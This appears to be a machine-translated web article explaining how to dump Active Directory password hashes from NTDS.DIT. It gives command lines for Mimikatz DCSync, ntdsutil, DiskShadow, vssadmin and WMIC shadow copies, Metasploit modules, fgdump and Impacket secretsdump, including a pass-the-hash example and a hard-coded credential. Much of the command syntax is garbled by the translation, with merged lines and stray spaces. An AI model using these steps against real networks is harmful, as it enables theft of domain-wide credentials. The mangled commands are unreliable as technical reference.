Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account


How to derive a domain password hash

2024-03-04 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >


Shulou( Report--

This article mainly shows you "how to derive the hash value of domain password", which is easy to understand and clear. I hope it can help you solve your doubts. Let me lead you to study and learn the article "how to derive the hash value of domain password".

The HASH exists in the NTDS.DIT in the domain. NTDS.DIT is a binary file, which is equivalent to the SAM file of the local computer, and its location is% SystemRoot%\ ntds\ NTDS.DIT. This contains not only Username and HASH, but also OU, Group and other information.

Like the SAM file, the file is locked by the system. Therefore, we cannot directly copy it and copy it to another location to extract the information.

Here are some of the most common techniques used to extract information from .dit files:

1.Domain Controller Replication Services (Domain Controller replication Service)

2.Native Windows Binaries



Mimikatz has a feature (dcsync) that uses the directory replication service (DRS) to retrieve password hashes from NTDS.DIT files. This technique eliminates the need to authenticate directly from the domain controller because it can be executed from any system that belongs to the domain in the domain administrator environment. Therefore, this is also a standard technique for red teams.

Lsadump::dcsync / domain:pentestlab.local / all / csv

By specifying the domain user name with the / user parameter, Mimikatz dumps all account information for that specified user, including hashes.

Lsadump::dcsync / domain:pentestlab.local / user:test

Or we can execute Mimikatz directly in the domain controller and dump password hash through the lsass.exe process.

Privilege::debuglsadump::lsa / inject

At this point, the password hash value of the domain user will be retrieved.


PowerShell Empire has two modules that can retrieve domain hashes through DCSync attacks. Both modules need to be executed with the privileges of the domain administrator, and they both use the Microsoft replication service. These two modules rely on Invoke-Mimikatz PowerShell scripts to execute DCSync-related Mimikatz commands. The hash extraction format of the following modules is similar to the output format of Metasploit hashdump.

Usemodule credentials/mimikatz/dcsync_hashdump

The DCSync module requires us to specify a user to extract all the information about the account.

After the execution is completed, we will get the following information:


Nishang is a PowerShell attack framework, which is a collection of PowerShell attack scripts and payloads, and is widely used in all stages of penetration testing. The Copy-VSS script can be used to automate the extraction of the required files: NTDS.DIT,SAM and SYSTEM. These files will be extracted to the current working directory or to the folder you specified.

Import-Module.\ Copy-VSS.ps1Copy-VSSCopy-VSS-DestinationDir C:\ ShadowCopy\

Alternatively, you can execute the script from an existing Meterpreter session by loading the PowerShell extension.

Load powershellpowershell_import / root/Copy-VSS.ps1powershell_execute Copy-VSS

You can also use the powershell_shell command to establish a PowerShell session and import the script to extract the file.

Copy-VSSCopy-VSS-DestinationDir C:\ NinjaPowerSploit

PowerSploit contains a PowerShell script that uses the Volume Shadow copy service to create new volumes that can be used to extract files.

Import-Module.\ VolumeShadowCopyTools.ps1New-VolumeShadowCopy-Volume C:\ Get-VolumeShadowCopy

Or it can be executed from an existing Meterpreter session by loading the PowerShell extension.

Powershell_shellNew-VolumeShadowCopy-Volume C:\ Get-VOlumeShadowCopy

You can use the copy command to copy files from the new volume to the destination.


Invoke-DCSync is a PowerShell script developed by Nick Landers and leverages PowerView, and Invoke-ReflectivePEInjection and PowerKatcher use Mimikatz's DCSync method to retrieve hash values. Executing the function directly produces the following output:


You can see that the results are output in tabular form. If we add the-PWDumpFormat parameter, the output format is user:id:lm:ntlm:::


Run the script from an existing Meterpreter session to get the same output.

After adding the-PWDumpFormat parameter:


Ntdsutil is a command-line tool that is part of the domain controller ecosystem and its primary purpose is to make it easy for administrators to access and manage Windows Active Directory databases. However, it is often abused by penetration testers or red team members to obtain snapshots of existing ntds.dit files, and the file can be copied to a new lease for offline analysis and password hash extraction.

Ntdsutilactivate instance ntdsifmcreate full C:\ ntdsutilquitquit

It will generate two new folders for us: Active Directory and Registry. The NTDS.DIT file will be saved to Active Directory, while the SAM and SYSTEM files will be saved to the Registry folder.


DiskShadow is an Microsoft signed binary that assists administrators in performing operations related to Volume Shadow copy Service (VSS). This binary has two modes, interactive and script, and the script will contain all the commands needed to automate the NTDS.DIT extraction process. We can add the following lines to the script file to create a new volume shadow copy (shadow copy), mount the new driver, execute the copy command, and delete the volume shadow copy.

Set context persistent nowritersadd volume c: alias someAliascreateexpose% someAlias% z:exec "cmd.exe" / c copy z:\ windows\ ntds\ ntds.dit c:\ exfil\ ntds.ditdelete shadows volume% someAlias%reset

It should be noted that the DiskShadow binaries need to be executed from the C:\ Windows\ System32 path. If it is called from another path, the script will not execute correctly.

Diskshadow.exe / s c:\ diskshadow.txt

Running the following command directly from the interpreter lists all available volume shadow copy for the system.


The SYSTEM registry hive should also be copied because it contains the keys needed to decrypt the contents of the NTDS file.

Reg.exe save hklm\ system c:\ exfil\ system.bakWMI

Sean Metcalf proved in his blog that NTDS.DIT and SYSTEM files can be extracted remotely through WMI. This technique uses vssadmin binaries to create shadow copies.

Wmic / node:dc / user:PENTESTLAB\ David / passwordParse pentestlab123! Process call create "cmd / c vssadmin create shadow / for=C: 2 > & 1"

It then executes the copy command remotely and extracts the NTDS.DIT file from the shadow copy to another directory on the target system.

Wmic / node:dc / user:PENTESTLAB\ David / passwordParse pentestlab123! Process call create "cmd / c copy\\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy1\ Windows\ NTDS\ NTDS.dit C:\ temp\ ntds.dit 2 > & 1"

The same applies to SYSTEM files.

Wmic / node:dc / user:PENTESTLAB\ David / passwordParse pentestlab123! Process call create "cmd / c copy\\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy1\ Windows\ System32\ config\ SYSTEM\ C:\ temp\ SYSTEM.hive 2 > & 1"

The extracted file is then transferred from the domain controller to another Windows system to dump the domain password hash.

PS C:\ Users\ test.PENTESTLAB > copy\\\ c$\ temp\ ntds.dit C:\ tempPS C:\ Users\ test.PENTESTLAB > copy\\\ c$\ temp\ SYSTEM.hive C:\ temp

If you have generated a golden ticket, you can use it instead of credentials to authenticate with the domain controller through Kerberos.


Volume shadow copy is a Windows command line utility that administrators can use to back up computers, volumes, and files (even if the operating system is using these resources). Volume Shadow Copy runs as a service and requires the file system format to be NTFS (the windows operating system file format is NTFS by default). Executing the following command from the Windows command prompt will create a snapshot of disk C so that we can copy it to another location (such as a local folder, network folder, or removable media) to gain access to it.

Vssadmin create shadow / for=C:

Since we have copied all the files on disk C to another location (HarddiskVolumeShadowCopy1), they will not be used directly by the operating system, and we can access and copy the files at will. Use the copy command to copy the NTDS.DIT and SYSTEM files to a new folder in the driver whose local name is ShadowCopy.

Copy\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy1\ Windows\ NTDS\ NTDS.dit C:\ ShadowCopycopy\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy1\ Windows\ System32\ config\ SYSTEM C:\ ShadowCopy

We need to copy these files from the domain controller to another host for further processing.


Tim Tomes has developed a utility similar to vssadmin, vssown, which can create and delete shadow copies, run arbitrary executables for unmounted shadow copies, and start and stop the shadow copy service.

Cscript vssown.vbs / startcscript vssown.vbs / create ccscript vssown.vbs / listcscript vssown.vbs / delete

The required files can be copied using the copy command.

Copy\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy11\ windows\ ntds\ ntds.dit C:\ vssowncopy\\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy11\ windows\ system32\ config\ SYSTEM C:\ vssowncopy\\?\ GLOBALROOT\ Device\ HarddiskVolumeShadowCopy11\ windows\ system32\ config\ SAM C:\ vssownMetasploit

There is a module in the Metasploit framework that authenticates directly with the domain controller through the SMB service, creates system-driven shadow copies, and downloads copies of NTDS.DIT and SYSTEM hive to the Metasploit directory. These files can be used in conjunction with other tools such as impacket, which can be used to perform the extraction of active directory password hashes.


There is also a post-utilization module that links to an existing Meterpreter session and retrieves domain hashes through the ntdsutil method.


Alternatively, if you have an existing Meterpreter session to the domain controller, you can use the hashdump command. However, this method is not secure because it is likely to cause the domain controller to crash.


Fgdump is a tool for extracting hashes of LanMan and NTLM passwords. If you have obtained local administrator credentials, you can execute them locally or remotely. During execution, fgdump will attempt to disable antivirus software running on the system and, if successful, write all data to two files. If there is anti-soft, it is recommended that you do not use fgdump to dump password hashes. Because it is marked by the antivirus software of most security companies (including Microsoft's Windows Defender).


Retrieve the password hash by examining the contents of the .pwdump file.

Type stealing

Impacket is a set of python scripts that can be used to perform a variety of tasks, including extracting the contents of the NTDS file. The impacket-secretsdump module requires us to provide SYSTEM and NTDS database files.

Impacket-secretsdump-system / root/SYSTEM-ntds / root/ntds.dit LOCAL

In addition, impacket can remotely dump domain password hashes from NTDS.DIT files by using computer accounts and their hashes for authentication.

Impacket-secretsdump-hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9-just-dc PENTESTLAB/dc\ $@

As an alternative to impacket, NTDSDumpEx binaries can extract domain password hashes from Windows hosts.

NTDSDumpEx.exe-d ntds.dit-s SYSTEM.hive

There is also a shell script adXtract that exports username and password hashes to a format that can be used by common password crackers, such as John the Ripper and Hashcat.

. / / root/ntds.dit / root/SYSTEM pentestlab

The script writes all the information to each file under the project name, and when the database file NTDS is decrypted, the user list and password hash values will be exported to the console. This script will provide us with a great deal of information about domain users, as shown below.

The password hash will be displayed in the following format.

The above is all the contents of the article "how to derive the hash value of domain passwords". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To



© 2024 SLNews company. All rights reserved.